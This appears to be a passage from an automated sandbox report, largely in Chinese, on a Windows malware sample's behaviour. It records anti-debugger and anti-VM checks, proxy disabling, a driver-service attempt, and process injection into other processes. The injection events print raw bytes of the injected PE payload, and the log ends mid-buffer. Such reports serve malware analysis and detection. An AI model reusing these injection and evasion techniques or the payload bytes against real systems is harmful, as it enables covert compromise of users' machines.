wmi select Name, DeviceID from Win32_SCSIController
wmi select Name, DeviceID from Win32_USBController
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCI\\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\\3&267A616A&0&68"} WHERE AssocClass = Win32_IDEControllerDevice
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0"} WHERE AssocClass = Win32_IDEControllerDevice
网络通信
一个或多个缓冲区包含嵌入的PE文件 (1 个事件)
buffer Buffer with sha1: 501b45da2f14fb66a5098cfaa2e35fcd0070956c
与未执行 DNS 查询的主机进行通信 (3 个事件)
host 114.114.114.114
host 8.8.8.8
host 47.102.103.145
Creates an Alternate Data Stream (ADS) (1 个事件)
file C:\Windows\apppat皷髺!€}滒-?v箕,?R纀"? 奕團v82*餢岨?[唨酸?NP獧8饜2①H 忠J!zp衟??:葧葐m
分配执行权限给另一个进程,可能表示代码注入 (4 个事件)
Time & API Arguments Status Return Repeated
1727545298.031125
NtAllocateVirtualMemory
process_handle: 0x000000e8
base_address: 0x022a0000
region_size: 688128
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.703125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02de0000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.000125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02d90000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1736
success 0 0
1727545397.266125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x03a30000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1684
success 0 0
Attempts to identify installed AV products by installation directory (1 个事件)
file C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
检查已知调试器和取证工具窗口的存在 (15 个事件)
Time & API Arguments Status Return Repeated
1727545297.37525
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545297.922125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545298.984125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545299.609125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545300.594125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545301.688125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545301.969125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.578125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.641125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.813125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.828125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545393.391125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545394.719125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545397.453125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545397.531125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
检查 Windows 空闲时间以确定运行时间 (5 个事件)
Time & API Arguments Status Return Repeated
1727545412.32825
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545414.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545414.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
1727545415.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545415.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
检查 BIOS 版本,可能用于反虚拟化 (1 个事件)
registry HKEY_LOCAL_MACHINE\SystemBiosVersion
创建了一个服务,但该服务并未启动 (1 个事件)
Time & API Arguments Status Return Repeated
1727545401.23425
CreateServiceW
service_manager_handle: 0x004c25d8
service_name: ComputerZ_x64
display_name: ComputerZ_x64
desired_access: 983551
service_type: 1
start_type: 3
error_control: 1
service_start_name:
password:
service_handle: 0x00000000
filepath: C:\Program Files (x86)\360\360DrvMgr\ComputerZ_x64.sys
filepath_r: C:\Program Files (x86)\360\360DrvMgr\ComputerZ_x64.sys
failed 0 0
禁用代理,可能用于流量拦截 (1 个事件)
Time & API Arguments Status Return Repeated
1727545298.422125
RegSetValueExA
key_handle: 0x00000284
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
value: 0
success 0 0
查询磁盘信息,可能用于反虚拟化 (50 out of 52 个事件)
Time & API Arguments Status Return Repeated
1727545398.59425
NtCreateFile
file_handle: 0x00000138
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545398.59425
DeviceIoControl
input_buffer:
device_handle: 0x00000138
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
1727545398.59425
NtCreateFile
file_handle: 0x00000138
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 128 (FILE_ATTRIBUTE_NORMAL)
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545398.75025
NtCreateFile
file_handle: 0x00000234
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545398.75025
DeviceIoControl
input_buffer:
device_handle: 0x00000234
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
1727545398.75025
NtCreateFile
file_handle: 0x00000234
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 128 (FILE_ATTRIBUTE_NORMAL)
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.42225
NtCreateFile
file_handle: 0x00000498
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.42225
DeviceIoControl
input_buffer:
device_handle: 0x00000498
control_code: 458752 (IOCTL_DISK_GET_DRIVE_GEOMETRY)
output_buffer: Q ÿ?
success 1 0
1727545402.42225
NtCreateFile
file_handle: 0x00000000
desired_access: 0x80100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 1 (FILE_SHARE_READ)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 4294967295 ()
failed 3221225539 0
1727545402.43825
NtCreateFile
file_handle: 0x0000048c
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIALL<®
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIARY< d
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMISAS<
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIALL<®
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIARY< d
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMISAS<
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.43825
DeviceIoControl
input_buffer: LSILOGIC¼
device_handle: 0x00000478
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: LSILOGIC¼
device_handle: 0x00000478
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000740
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.48425
NtCreateFile
file_handle: 0x00000740
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.51625
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x00000530
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.53125
NtCreateFile
file_handle: 0x000004f0
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 1 (FILE_SHARE_READ)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.53125
DeviceIoControl
input_buffer:
device_handle: 0x000004f0
control_code: 2954240 ()
output_buffer:
success 1 0
1727545402.53125
DeviceIoControl
input_buffer:
device_handle: 0x000004f0
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
使用 CreateRemoteThread 在非子进程中创建线程,表明进程注入的迹象 (6 个事件)
进程注入 进程 2228 在非子进程 348 中创建了远程线程
进程注入 进程 2228 在非子进程 1736 中创建了远程线程
进程注入 进程 2228 在非子进程 1684 中创建了远程线程
Time & API Arguments Status Return Repeated
1727545396.984125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x02de1360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 348
success 2700 0
1727545397.250125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x02d91360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 1736
success 2700 0
1727545397.719125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x03a31360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 1684
success 1692 0
操纵非子进程的内存,表明进程注入 (8 个事件)
进程注入 进程 2228 操纵非子进程 2228 的内存
进程注入 进程 2228 操纵非子进程 348 的内存
进程注入 进程 2228 操纵非子进程 1736 的内存
进程注入 进程 2228 操纵非子进程 1684 的内存
Time & API Arguments Status Return Repeated
1727545298.031125
NtAllocateVirtualMemory
process_handle: 0x000000e8
base_address: 0x022a0000
region_size: 688128
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.703125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02de0000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.000125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02d90000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1736
success 0 0
1727545397.266125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x03a30000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1684
success 0 0
通过写入另一个进程的内存进行潜在代码注入 (16 个事件)
进程注入 进程 2228 注入到非子进程 2228
进程注入 进程 2228 注入到非子进程 348
进程注入 进程 2228 注入到非子进程 1736
进程注入 进程 2228 注入到非子进程 1684
Time & API Arguments Status Return Repeated
1727545298.031125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022a0000
process_identifier: 2228
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P*@@.text `.data  @À.reloc`@(@B
success 1 0
1727545298.031125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022a1000
process_identifier: 2228
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M ó¤Æ„ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545298.063125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022f4000
process_identifier: 2228
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545396.703125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de0000
process_identifier: 348
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545396.703125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de1000
process_identifier: 348
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M ó¤Æ„ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 